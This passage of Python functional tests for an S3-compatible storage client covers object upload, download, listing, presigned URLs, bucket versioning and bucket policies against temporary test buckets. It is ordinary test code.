unmod_since = datetime(2014, 4, 1, tzinfo=UTC)
copy_conditions.set_unmodified_since(unmod_since)
log_entry["args"]["conditions"] = {
'set_unmodified_since': unmod_since.strftime('%c')}
try:
# Perform a server side copy of an object and expect
# the copy to fail since the creation/modification
# time is now, way later than unmodification time, April 1st, 2014
_CLIENT.copy_object(bucket_name, object_copy,
'/' + bucket_name + '/' + object_source,
copy_conditions)
except S3Error as exc:
if exc.code != "PreconditionFailed":
raise
finally:
_CLIENT.remove_object(bucket_name, object_source)
_CLIENT.remove_object(bucket_name, object_copy)
_CLIENT.remove_bucket(bucket_name)
def test_put_object(log_entry, sse=None):
"""Test put_object()."""
if sse:
log_entry["name"] += "_SSE"
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
length = 1 * MB
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
"length": length,
"data": "LimitedRandomReader(1 * MB)"
}
try:
_CLIENT.make_bucket(bucket_name)
# Put/Upload a streaming object of 1 MiB
reader = LimitedRandomReader(length)
_CLIENT.put_object(bucket_name, object_name, reader, length, sse=sse)
_CLIENT.stat_object(bucket_name, object_name, sse=sse)
# Put/Upload a streaming object of 11 MiB
log_entry["args"]["length"] = length = 11 * MB
reader = LimitedRandomReader(length)
log_entry["args"]["data"] = "LimitedRandomReader(11 * MB)"
log_entry["args"]["metadata"] = metadata = {
'x-amz-meta-testing': 'value', 'test-key': 'value2'}
log_entry["args"]["content_type"] = content_type = (
"application/octet-stream")
log_entry["args"]["object_name"] = object_name + "-metadata"
_CLIENT.put_object(bucket_name, object_name + "-metadata", reader,
length, content_type, metadata, sse=sse)
# Stat on the uploaded object to check if it exists
# Fetch saved stat metadata on a previously uploaded object with
# metadata.
st_obj = _CLIENT.stat_object(bucket_name, object_name + "-metadata",
sse=sse)
normalized_meta = {
key.lower(): value for key, value in (
st_obj.metadata or {}).items()
}
if 'x-amz-meta-testing' not in normalized_meta:
raise ValueError("Metadata key 'x-amz-meta-testing' not found")
value = normalized_meta['x-amz-meta-testing']
if value != 'value':
raise ValueError('Metadata key has unexpected'
' value {0}'.format(value))
if 'x-amz-meta-test-key' not in normalized_meta:
raise ValueError("Metadata key 'x-amz-meta-test-key' not found")
finally:
_CLIENT.remove_object(bucket_name, object_name)
_CLIENT.remove_object(bucket_name, object_name+'-metadata')
_CLIENT.remove_bucket(bucket_name)
def test_negative_put_object_with_path_segment( # pylint: disable=invalid-name
log_entry):
"""Test put_object() failure with path segment."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "/a/b/c/{0}".format(uuid4())
length = 0
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
"length": length,
"data": "",
}
try:
_CLIENT.make_bucket(bucket_name)
_CLIENT.put_object(bucket_name, object_name, io.BytesIO(b''), 0)
_CLIENT.remove_object(bucket_name, object_name)
except S3Error as err:
if err.code != 'XMinioInvalidObjectName':
raise
finally:
_CLIENT.remove_bucket(bucket_name)
def _test_stat_object(log_entry, sse=None, version_check=False):
"""Test stat_object()."""
if sse:
log_entry["name"] += "_SSEC"
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
length = 1 * MB
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
"length": length,
"data": "LimitedRandomReader(1 * MB)"
}
version_id1 = None
version_id2 = None
_CLIENT.make_bucket(bucket_name)
try:
if version_check:
_CLIENT.set_bucket_versioning(
bucket_name, VersioningConfig(ENABLED),
)
# Put/Upload a streaming object of 1 MiB
reader = LimitedRandomReader(length)
result = _CLIENT.put_object(
bucket_name, object_name, reader, length, sse=sse,
)
version_id1 = result.version_id
_CLIENT.stat_object(
bucket_name, object_name, sse=sse, version_id=version_id1,
)
# Put/Upload a streaming object of 11 MiB
log_entry["args"]["length"] = length = 11 * MB
reader = LimitedRandomReader(length)
log_entry["args"]["data"] = "LimitedRandomReader(11 * MB)"
log_entry["args"]["metadata"] = metadata = {
'X-Amz-Meta-Testing': 'value'}
log_entry["args"]["content_type"] = content_type = (
"application/octet-stream")
log_entry["args"]["object_name"] = object_name + "-metadata"
result = _CLIENT.put_object(
bucket_name, object_name + "-metadata", reader,
length, content_type, metadata, sse=sse,
)
version_id2 = result.version_id
# Stat on the uploaded object to check if it exists
# Fetch saved stat metadata on a previously uploaded object with
# metadata.
st_obj = _CLIENT.stat_object(
bucket_name, object_name + "-metadata",
sse=sse, version_id=version_id2,
)
# Verify the collected stat data.
_validate_stat(
st_obj, length, metadata, version_id=version_id2,
)
finally:
_CLIENT.remove_object(bucket_name, object_name, version_id=version_id1)
_CLIENT.remove_object(
bucket_name, object_name+'-metadata', version_id=version_id2,
)
_CLIENT.remove_bucket(bucket_name)
def test_stat_object(log_entry, sse=None):
"""Test stat_object()."""
_test_stat_object(log_entry, sse)
def test_stat_object_version(log_entry, sse=None):
"""Test stat_object() of versioned object."""
_test_stat_object(log_entry, sse, version_check=True)
def _test_remove_object(log_entry, version_check=False):
"""Test remove_object()."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
length = 1 * KB
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
}
_CLIENT.make_bucket(bucket_name)
try:
if version_check:
_CLIENT.set_bucket_versioning(
bucket_name, VersioningConfig(ENABLED),
)
result = _CLIENT.put_object(
bucket_name, object_name, LimitedRandomReader(length), length,
)
_CLIENT.remove_object(
bucket_name, object_name, version_id=result.version_id,
)
finally:
_CLIENT.remove_bucket(bucket_name)
def test_remove_object(log_entry):
"""Test remove_object()."""
_test_remove_object(log_entry)
def test_remove_object_version(log_entry):
"""Test remove_object() of versioned object."""
_test_remove_object(log_entry, version_check=True)
def _test_get_object(log_entry, sse=None, version_check=False):
"""Test get_object()."""
if sse:
log_entry["name"] += "_SSEC"
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
length = 1 * MB
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
}
_CLIENT.make_bucket(bucket_name)
version_id = None
try:
if version_check:
_CLIENT.set_bucket_versioning(
bucket_name, VersioningConfig(ENABLED),
)
result = _CLIENT.put_object(
bucket_name, object_name, LimitedRandomReader(length),
length, sse=sse,
)
version_id = result.version_id
# Get/Download a full object, iterate on response to save to disk
object_data = _CLIENT.get_object(
bucket_name, object_name, sse=sse, version_id=version_id,
)
newfile = 'newfile جديد'
with open(newfile, 'wb') as file_data:
shutil.copyfileobj(object_data, file_data)
os.remove(newfile)
finally:
_CLIENT.remove_object(bucket_name, object_name, version_id=version_id)
_CLIENT.remove_bucket(bucket_name)
def test_get_object(log_entry, sse=None):
"""Test get_object()."""
_test_get_object(log_entry, sse)
def test_get_object_version(log_entry, sse=None):
"""Test get_object() for versioned object."""
_test_get_object(log_entry, sse, version_check=True)
def _test_fget_object(log_entry, sse=None, version_check=False):
"""Test fget_object()."""
if sse:
log_entry["name"] += "_SSEC"
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
tmpfd, tmpfile = tempfile.mkstemp()
os.close(tmpfd)
length = 1 * MB
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
"file_path": tmpfile
}
_CLIENT.make_bucket(bucket_name)
version_id = None
try:
if version_check:
_CLIENT.set_bucket_versioning(
bucket_name, VersioningConfig(ENABLED),
)
result = _CLIENT.put_object(
bucket_name, object_name, LimitedRandomReader(length),
length, sse=sse,
)
version_id = result.version_id
# Get/Download a full object and save locally at path
_CLIENT.fget_object(
bucket_name, object_name, tmpfile, sse=sse, version_id=version_id,
)
os.remove(tmpfile)
finally:
_CLIENT.remove_object(bucket_name, object_name, version_id=version_id)
_CLIENT.remove_bucket(bucket_name)
def test_fget_object(log_entry, sse=None):
"""Test fget_object()."""
_test_fget_object(log_entry, sse)
def test_fget_object_version(log_entry, sse=None):
"""Test fget_object() of versioned object."""
_test_fget_object(log_entry, sse, version_check=True)
def test_get_object_with_default_length( # pylint: disable=invalid-name
log_entry, sse=None):
"""Test get_object() with default length."""
if sse:
log_entry["name"] += "_SSEC"
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
size = 1 * MB
length = 1000
offset = size - length
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
"offset": offset
}
_CLIENT.make_bucket(bucket_name)
try:
_CLIENT.put_object(bucket_name, object_name,
LimitedRandomReader(size), size, sse=sse)
# Get the last `length` bytes of the object (from `offset` to the end)
object_data = _CLIENT.get_object(bucket_name, object_name,
offset=offset, sse=sse)
newfile = 'newfile'
with open(newfile, 'wb') as file_data:
for data in object_data:
file_data.write(data)
# Check if the new file is the right size
new_file_size = os.path.getsize(newfile)
os.remove(newfile)
if new_file_size != length:
raise ValueError('Unexpected file size after running get_object()')
finally:
_CLIENT.remove_object(bucket_name, object_name)
_CLIENT.remove_bucket(bucket_name)
def test_get_partial_object(log_entry, sse=None):
"""Test get_object() by offset/length."""
if sse:
log_entry["name"] += "_SSEC"
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
size = 1 * MB
offset = int(size / 2)
length = offset - 1000
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
"offset": offset
}
_CLIENT.make_bucket(bucket_name)
try:
_CLIENT.put_object(bucket_name, object_name,
LimitedRandomReader(size), size, sse=sse)
# Get a partial object: `length` bytes starting at `offset`
object_data = _CLIENT.get_object(bucket_name, object_name,
offset=offset, length=length, sse=sse)
newfile = 'newfile'
with open(newfile, 'wb') as file_data:
for data in object_data:
file_data.write(data)
# Check if the new file is the right size
new_file_size = os.path.getsize(newfile)
os.remove(newfile)
if new_file_size != length:
raise ValueError('Unexpected file size after running get_object()')
finally:
_CLIENT.remove_object(bucket_name, object_name)
_CLIENT.remove_bucket(bucket_name)
def _test_list_objects(log_entry, use_api_v1=False, version_check=False):
"""Test list_objects()."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
is_recursive = True
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
"recursive": is_recursive,
}
_CLIENT.make_bucket(bucket_name)
version_id1 = None
version_id2 = None
try:
if version_check:
_CLIENT.set_bucket_versioning(
bucket_name, VersioningConfig(ENABLED),
)
size = 1 * KB
result = _CLIENT.put_object(
bucket_name, object_name + "-1", LimitedRandomReader(size), size,
)
version_id1 = result.version_id
result = _CLIENT.put_object(
bucket_name, object_name + "-2", LimitedRandomReader(size), size,
)
version_id2 = result.version_id
# List all object paths in bucket.
objects = _CLIENT.list_objects(
bucket_name, '', is_recursive, include_version=version_check,
use_api_v1=use_api_v1,
)
for obj in objects:
_ = (obj.bucket_name, obj.object_name, obj.last_modified,
obj.etag, obj.size, obj.content_type)
if obj.version_id not in [version_id1, version_id2]:
raise ValueError(
"version ID mismatch. expected=any{0}, got:{1}".format(
[version_id1, version_id2], obj.verion_id,
)
)
finally:
_CLIENT.remove_object(
bucket_name, object_name + "-1", version_id=version_id1,
)
_CLIENT.remove_object(
bucket_name, object_name + "-2", version_id=version_id2,
)
_CLIENT.remove_bucket(bucket_name)
def test_list_objects_v1(log_entry):
"""Test list_objects()."""
_test_list_objects(log_entry, use_api_v1=True)
def test_list_object_v1_versions(log_entry):
"""Test list_objects()."""
_test_list_objects(log_entry, use_api_v1=True, version_check=True)
def _test_list_objects_api(bucket_name, expected_no, *argv):
"""Test list_objects()."""
# argv is composed of prefix and recursive arguments of
# list_objects api. They are both supposed to be passed as strings.
objects = _CLIENT.list_objects(bucket_name, *argv)
# expect all objects to be listed
no_of_files = 0
for obj in objects:
_ = (obj.bucket_name, obj.object_name, obj.last_modified, obj.etag,
obj.size, obj.content_type)
no_of_files += 1
if expected_no != no_of_files:
raise ValueError(
("Listed no of objects ({}), does not match the "
"expected no of objects ({})").format(no_of_files, expected_no))
def test_list_objects_with_prefix(log_entry):
"""Test list_objects() with prefix."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
}
_CLIENT.make_bucket(bucket_name)
try:
size = 1 * KB
no_of_created_files = 4
path_prefix = ""
# Create files and directories
for i in range(no_of_created_files):
_CLIENT.put_object(bucket_name,
"{0}{1}_{2}".format(
path_prefix,
i,
object_name,
),
LimitedRandomReader(size), size)
path_prefix = "{0}{1}/".format(path_prefix, i)
# Created files and directory structure
# ._<bucket_name>/
# |___0_<object_name>
# |___0/
# |___1_<object_name>
# |___1/
# |___2_<object_name>
# |___2/
# |___3_<object_name>
#
# Test and verify list_objects api outputs
# List objects recursively with NO prefix
log_entry["args"]["prefix"] = prefix = "" # no prefix
log_entry["args"]["recursive"] = recursive = ""
_test_list_objects_api(bucket_name, no_of_created_files, prefix, True)
# List objects at the top level with no prefix and no recursive option
# Expect only the top 2 objects to be listed
_test_list_objects_api(bucket_name, 2)
# List objects for '0' directory/prefix without recursive option
# Expect 2 objects (directory '0' and the '0_' object) to be listed
log_entry["args"]["prefix"] = prefix = "0"
_test_list_objects_api(bucket_name, 2, prefix)
# List objects for '0/' directory/prefix without recursive option
# Expect only 2 objects under directory '0/' to be listed,
# non-recursive
log_entry["args"]["prefix"] = prefix = "0/"
_test_list_objects_api(bucket_name, 2, prefix)
# List objects for '0/' directory/prefix, recursively
# Expect 3 objects under directory '0/' to be listed
log_entry["args"]["prefix"] = prefix = "0/"
log_entry["args"]["recursive"] = recursive = "True"
_test_list_objects_api(bucket_name, 3, prefix, recursive)
# List object with '0/1/2/' directory/prefix, non-recursive
# Expect the single object under directory '0/1/2/' to be listed
log_entry["args"]["prefix"] = prefix = "0/1/2/"
_test_list_objects_api(bucket_name, 1, prefix)
finally:
path_prefix = ""
for i in range(no_of_created_files):
_CLIENT.remove_object(
bucket_name,
"{0}{1}_{2}".format(path_prefix, i, object_name))
path_prefix = "{0}{1}/".format(path_prefix, i)
_CLIENT.remove_bucket(bucket_name)
# Test passes
log_entry["args"]["prefix"] = (
"Several prefix/recursive combinations are tested")
log_entry["args"]["recursive"] = (
'Several prefix/recursive combinations are tested')
def test_list_objects_with_1001_files( # pylint: disable=invalid-name
log_entry):
"""Test list_objects() with more 1000 objects."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": "{0}_0 ~ {0}_1000".format(object_name),
}
_CLIENT.make_bucket(bucket_name)
try:
size = 1 * KB
no_of_created_files = 2000
# Create files and directories
for i in range(no_of_created_files):
_CLIENT.put_object(bucket_name,
"{0}_{1}".format(object_name, i),
LimitedRandomReader(size), size)
# List objects and check that all created files are returned
_test_list_objects_api(bucket_name, no_of_created_files)
finally:
for i in range(no_of_created_files):
_CLIENT.remove_object(bucket_name,
"{0}_{1}".format(object_name, i))
_CLIENT.remove_bucket(bucket_name)
def test_list_objects(log_entry):
"""Test list_objects()."""
_test_list_objects(log_entry)
def test_list_object_versions(log_entry):
"""Test list_objects() of versioned object."""
_test_list_objects(log_entry, version_check=True)
def test_presigned_get_object_default_expiry( # pylint: disable=invalid-name
log_entry):
"""Test presigned_get_object() with default expiry."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
}
_CLIENT.make_bucket(bucket_name)
try:
size = 1 * KB
_CLIENT.put_object(bucket_name, object_name, LimitedRandomReader(size),
size)
presigned_get_object_url = _CLIENT.presigned_get_object(
bucket_name, object_name)
response = HTTP.urlopen('GET', presigned_get_object_url)
if response.status != 200:
raise Exception(
(
"Presigned GET object URL {0} failed; "
"code: {1}, error: {2}"
).format(
presigned_get_object_url, response.code, response.data,
),
)
finally:
_CLIENT.remove_object(bucket_name, object_name)
_CLIENT.remove_bucket(bucket_name)
def test_presigned_get_object_expiry( # pylint: disable=invalid-name
log_entry):
"""Test presigned_get_object() with expiry."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
}
_CLIENT.make_bucket(bucket_name)
try:
size = 1 * KB
_CLIENT.put_object(bucket_name, object_name, LimitedRandomReader(size),
size)
presigned_get_object_url = _CLIENT.presigned_get_object(
bucket_name, object_name, timedelta(seconds=120))
response = HTTP.urlopen('GET', presigned_get_object_url)
if response.status != 200:
raise Exception(
(
"Presigned GET object URL {0} failed; "
"code: {1}, error: {2}"
).format(
presigned_get_object_url, response.code, response.data,
),
)
log_entry["args"]["presigned_get_object_url"] = (
presigned_get_object_url)
response = HTTP.urlopen('GET', presigned_get_object_url)
log_entry["args"]['response.status'] = response.status
log_entry["args"]['response.reason'] = response.reason
log_entry["args"]['response.headers'] = json.dumps(
response.headers.__dict__)
# pylint: disable=protected-access
log_entry["args"]['response._body'] = response._body.decode('utf-8')
if response.status != 200:
raise Exception(
(
"Presigned GET object URL {0} failed; "
"code: {1}, error: {2}"
).format(
presigned_get_object_url, response.code, response.data,
),
)
presigned_get_object_url = _CLIENT.presigned_get_object(
bucket_name, object_name, timedelta(seconds=1))
# Wait for 2 seconds for the presigned url to expire
time.sleep(2)
response = HTTP.urlopen('GET', presigned_get_object_url)
log_entry["args"]['response.status-2'] = response.status
log_entry["args"]['response.reason-2'] = response.reason
log_entry["args"]['response.headers-2'] = json.dumps(
response.headers.__dict__)
log_entry["args"]['response._body-2'] = response._body.decode('utf-8')
# Success with an expired url is considered to be a failure
if response.status == 200:
raise ValueError('Presigned get url failed to expire!')
finally:
_CLIENT.remove_object(bucket_name, object_name)
_CLIENT.remove_bucket(bucket_name)
def test_presigned_get_object_response_headers( # pylint: disable=invalid-name
log_entry):
"""Test presigned_get_object() with headers."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
content_type = 'text/plain'
content_language = 'en_US'
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
"content_type": content_type,
"content_language": content_language,
}
_CLIENT.make_bucket(bucket_name)
try:
size = 1 * KB
_CLIENT.put_object(bucket_name, object_name, LimitedRandomReader(size),
size)
presigned_get_object_url = _CLIENT.presigned_get_object(
bucket_name, object_name, timedelta(seconds=120))
response_headers = {
'response-content-type': content_type,
'response-content-language': content_language
}
presigned_get_object_url = _CLIENT.presigned_get_object(
bucket_name, object_name, timedelta(seconds=120), response_headers)
log_entry["args"]["presigned_get_object_url"] = (
presigned_get_object_url)
response = HTTP.urlopen('GET', presigned_get_object_url)
returned_content_type = response.headers['Content-Type']
returned_content_language = response.headers['Content-Language']
log_entry["args"]['response.status'] = response.status
log_entry["args"]['response.reason'] = response.reason
log_entry["args"]['response.headers'] = json.dumps(
response.headers.__dict__)
# pylint: disable=protected-access
log_entry["args"]['response._body'] = response._body.decode('utf-8')
log_entry["args"]['returned_content_type'] = returned_content_type
log_entry["args"]['returned_content_language'] = (
returned_content_language)
if (response.status != 200 or
returned_content_type != content_type or
returned_content_language != content_language):
raise Exception(
(
"Presigned GET object URL {0} failed; "
"code: {1}, error: {2}"
).format(
presigned_get_object_url, response.code, response.data,
),
)
finally:
_CLIENT.remove_object(bucket_name, object_name)
_CLIENT.remove_bucket(bucket_name)
def test_presigned_get_object_version( # pylint: disable=invalid-name
log_entry):
"""Test presigned_get_object() of versioned object."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
}
_CLIENT.make_bucket(bucket_name)
version_id = None
try:
_CLIENT.set_bucket_versioning(bucket_name, VersioningConfig(ENABLED))
size = 1 * KB
result = _CLIENT.put_object(
bucket_name, object_name, LimitedRandomReader(size), size,
)
version_id = result.version_id
presigned_get_object_url = _CLIENT.presigned_get_object(
bucket_name, object_name, version_id=version_id,
)
response = HTTP.urlopen('GET', presigned_get_object_url)
if response.status != 200:
raise Exception(
(
"Presigned GET object URL {0} failed; "
"code: {1}, error: {2}"
).format(
presigned_get_object_url, response.code, response.data,
),
)
finally:
_CLIENT.remove_object(bucket_name, object_name, version_id=version_id)
_CLIENT.remove_bucket(bucket_name)
def test_presigned_put_object_default_expiry( # pylint: disable=invalid-name
log_entry):
"""Test presigned_put_object() with default expiry."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
}
_CLIENT.make_bucket(bucket_name)
try:
presigned_put_object_url = _CLIENT.presigned_put_object(
bucket_name, object_name)
response = HTTP.urlopen('PUT',
presigned_put_object_url,
LimitedRandomReader(1 * KB))
if response.status != 200:
raise Exception(
(
"Presigned PUT object URL {0} failed; "
"code: {1}, error: {2}"
).format(
presigned_put_object_url, response.code, response.data,
),
)
_CLIENT.stat_object(bucket_name, object_name)
finally:
_CLIENT.remove_object(bucket_name, object_name)
_CLIENT.remove_bucket(bucket_name)
def test_presigned_put_object_expiry( # pylint: disable=invalid-name
log_entry):
"""Test presigned_put_object() with expiry."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
}
_CLIENT.make_bucket(bucket_name)
try:
presigned_put_object_url = _CLIENT.presigned_put_object(
bucket_name, object_name, timedelta(seconds=1))
# Wait for 2 seconds for the presigned url to expire
time.sleep(2)
response = HTTP.urlopen('PUT',
presigned_put_object_url,
LimitedRandomReader(1 * KB))
if response.status == 200:
raise ValueError('Presigned put url failed to expire!')
finally:
_CLIENT.remove_object(bucket_name, object_name)
_CLIENT.remove_bucket(bucket_name)
def test_presigned_post_policy(log_entry):
"""Test presigned_post_policy()."""
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
log_entry["args"] = {
"bucket_name": bucket_name,
}
_CLIENT.make_bucket(bucket_name)
try:
no_of_days = 10
prefix = 'objectPrefix/'
# Post policy.
policy = PostPolicy()
policy.set_bucket_name(bucket_name)
policy.set_key_startswith(prefix)
expires_date = datetime.utcnow() + timedelta(days=no_of_days)
policy.set_expires(expires_date)
# The post_policy arg is an object; to avoid logging a meaningless
# repr of it, the policy settings themselves are recorded in the args
# for clarity and debugging purposes.
log_entry["args"]["post_policy"] = {'prefix': prefix,
'expires_in_days': no_of_days}
_CLIENT.presigned_post_policy(policy)
finally:
_CLIENT.remove_bucket(bucket_name)
def test_thread_safe(log_entry):
"""Test thread safety."""
# Create sha-sum value for the user provided
# source file, 'test_file'
test_file_sha_sum = _get_sha256sum(_LARGE_FILE)
# Get a unique bucket_name and object_name
bucket_name = _gen_bucket_name()
object_name = "{0}".format(uuid4())
log_entry["args"] = {
"bucket_name": bucket_name,
"object_name": object_name,
}
# A list of exceptions raised by get_object_and_check
# called in multiple threads.
exceptions = []
# get_object_and_check() downloads an object, stores it in a file
# and then calculates its checksum. In case of mismatch, a new
# exception is generated and saved in exceptions.
def get_object_and_check(index):
try:
local_file = "copied_file_{0}".format(index)
_CLIENT.fget_object(bucket_name, object_name, local_file)
copied_file_sha_sum = _get_sha256sum(local_file)
# Compare sha-sum values of the source file and the copied one
if test_file_sha_sum != copied_file_sha_sum:
raise ValueError(
'Sha-sum mismatch on multi-threaded put and '
'get objects')
except Exception as exc: # pylint: disable=broad-except
exceptions.append(exc)
finally:
# Remove downloaded file
_ = os.path.isfile(local_file) and os.remove(local_file)
_CLIENT.make_bucket(bucket_name)
no_of_threads = 5
try:
# Put/Upload 'no_of_threads' many objects
# simultaneously using multi-threading
for _ in range(no_of_threads):
thread = Thread(target=_CLIENT.fput_object,
args=(bucket_name, object_name, _LARGE_FILE))
thread.start()
thread.join()
# Get/Download 'no_of_threads' many objects
# simultaneously using multi-threading
thread_list = []
for i in range(no_of_threads):
# Create dynamically named threads
thread_name = 'thread_{0}'.format(i)
vars()[thread_name] = Thread(
target=get_object_and_check, args=(i,))
vars()[thread_name].start()
thread_list.append(vars()[thread_name])
# Wait until all threads finish
for thread in thread_list:
thread.join()
if exceptions:
raise exceptions[0]
finally:
_CLIENT.remove_object(bucket_name, object_name)
_CLIENT.remove_bucket(bucket_name)
def test_get_bucket_policy(log_entry):
"""Test get_bucket_policy()."""
# Get a unique bucket_name
bucket_name = _gen_bucket_name()
log_entry["args"] = {
"bucket_name": bucket_name,
}
_CLIENT.make_bucket(bucket_name)
try:
_CLIENT.get_bucket_policy(bucket_name)
except S3Error as exc:
if exc.code != "NoSuchBucketPolicy":
raise
finally:
_CLIENT.remove_bucket(bucket_name)
def _get_policy_actions(stat):
"""Get policy actions from stat information."""
def listit(value):
return value if isinstance(value, list) else [value]
actions = [listit(s.get("Action")) for s in stat if s.get("Action")]
actions = list(set(
item.replace("s3:", "") for sublist in actions for item in sublist
))
actions.sort()
return actions
def _validate_policy(bucket_name, policy):
"""Validate policy."""
policy_dict = json.loads(_CLIENT.get_bucket_policy(bucket_name))
actions = _get_policy_actions(policy_dict.get('Statement'))
expected_actions = _get_policy_actions(policy.get('Statement'))
return expected_actions == actions
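# A minimal sketch (not part of the test suite) of how _get_policy_actions
# normalizes policy statements before comparison: single actions and action
# lists are flattened, the "s3:" prefix is stripped, and the result is sorted,
# so two equivalent policies compare equal regardless of ordering.
def _example_policy_action_normalization():
    statements = [
        {"Action": "s3:GetObject", "Effect": "Allow"},
        {"Action": ["s3:ListBucket", "s3:GetBucketLocation"], "Effect": "Allow"},
    ]
    actions = _get_policy_actions(statements)
    # actions == ['GetBucketLocation', 'GetObject', 'ListBucket']
    return actions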
def test_get_bucket_notification(log_entry):
"""Test get_bucket_notification()."""
# Get a unique bucket_name
bucket_name = _gen_bucket_name()
log_entry["args"] = {
"bucket_name": bucket_name,
}
_CLIENT.make_bucket(bucket_name)
try:
config = _CLIENT.get_bucket_notification(bucket_name)
if (
config.cloud_func_config_list or config.queue_config_list or
config.topic_config_list
):
raise ValueError("Failed to receive an empty bucket notification")
finally:
_CLIENT.remove_bucket(bucket_name)
def test_set_bucket_policy_readonly(log_entry):
"""Test set_bucket_policy() with readonly policy."""
# Get a unique bucket_name
bucket_name = _gen_bucket_name()
log_entry["args"] = {
"bucket_name": bucket_name,
}
_CLIENT.make_bucket(bucket_name)
try:
# read-only policy
policy = {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetBucketLocation",
"Resource": "arn:aws:s3:::" + bucket_name
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::" + bucket_name
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::{0}/*".format(bucket_name)
}
]
}
# Set read-only policy
_CLIENT.set_bucket_policy(bucket_name, json.dumps(policy))
# Validate if the policy is set correctly
if not _validate_policy(bucket_name, policy):
raise ValueError('Failed to set ReadOnly bucket policy')
finally:
_CLIENT.remove_bucket(bucket_name)
def test_set_bucket_policy_readwrite( # pylint: disable=invalid-name
log_entry):
"""Test set_bucket_policy() with read/write policy."""
# Get a unique bucket_name
bucket_name = _gen_bucket_name()
log_entry["args"] = {
"bucket_name": bucket_name,
}
_CLIENT.make_bucket(bucket_name)
try:
# Read-write policy
policy = {
"Version": "2012-10-17",
"Statement": [
{
"Action": ["s3:GetBucketLocation"],
"Sid": "",
"Resource": ["arn:aws:s3:::" + bucket_name],
"Effect": "Allow",
"Principal": {"AWS": "*"}
},
{
"Action": ["s3:ListBucket"],
"Sid": "",
"Resource": ["arn:aws:s3:::" + bucket_name],
"Effect": "Allow",
"Principal": {"AWS": "*"}
},
{
"Action": ["s3:ListBucketMultipartUploads"],
"Sid": "",
"Resource": ["arn:aws:s3:::" + bucket_name],
"Effect": "Allow",
"Principal": {"AWS": "*"}
},
{
"Action": ["s3:ListMultipartUploadParts",
"s3:GetObject",
"s3:AbortMultipartUpload",
"s3:DeleteObject",
"s3:PutObject"],
"Sid": "",
"Resource": ["arn:aws:s3:::{0}/*".format(bucket_name)],
"Effect": "Allow",
"Principal": {"AWS": "*"}
}
]
}
# Set read-write policy
_CLIENT.set_bucket_policy(bucket_name, json.dumps(policy))
# Validate if the policy is set correctly
if not _validate_policy(bucket_name, policy):
raise ValueError('Failed to set ReadWrite bucket policy')
finally:
_CLIENT.remove_bucket(bucket_name)
def _test_remove_objects(log_entry, version_check=False):
"""Test remove_objects()."""
# Get a unique bucket_name
bucket_name = _gen_bucket_name()
log_entry["args"] = {
"bucket_name": bucket_name,
}
_CLIENT.make_bucket(bucket_name)
object_names = []
delete_object_list = []  # initialized here so the cleanup below cannot fail with a NameError
try:
if version_check:
_CLIENT.set_bucket_versioning(
bucket_name, VersioningConfig(ENABLED),
)
size = 1 * KB
# Upload some new objects to prepare for multi-object delete test.
for i in range(10):
object_name = "prefix-{0}".format(i)
result = _CLIENT.put_object(
bucket_name, object_name, LimitedRandomReader(size), size,
)
object_names.append(
(object_name, result.version_id) if version_check
else object_name,
)
log_entry["args"]["delete_object_list"] = object_names
delete_object_list = []
for args in object_names:
delete_object_list.append(
DeleteObject(args) if isinstance(args, str)
else DeleteObject(args[0], args[1])
)
# delete the objects in a single library call.
errs = _CLIENT.remove_objects(bucket_name, delete_object_list)
for err in errs:
raise ValueError("Remove objects err: {}".format(err))
finally:
# Try to clean everything to keep our server intact
errs = _CLIENT.remove_objects(bucket_name, delete_object_list)
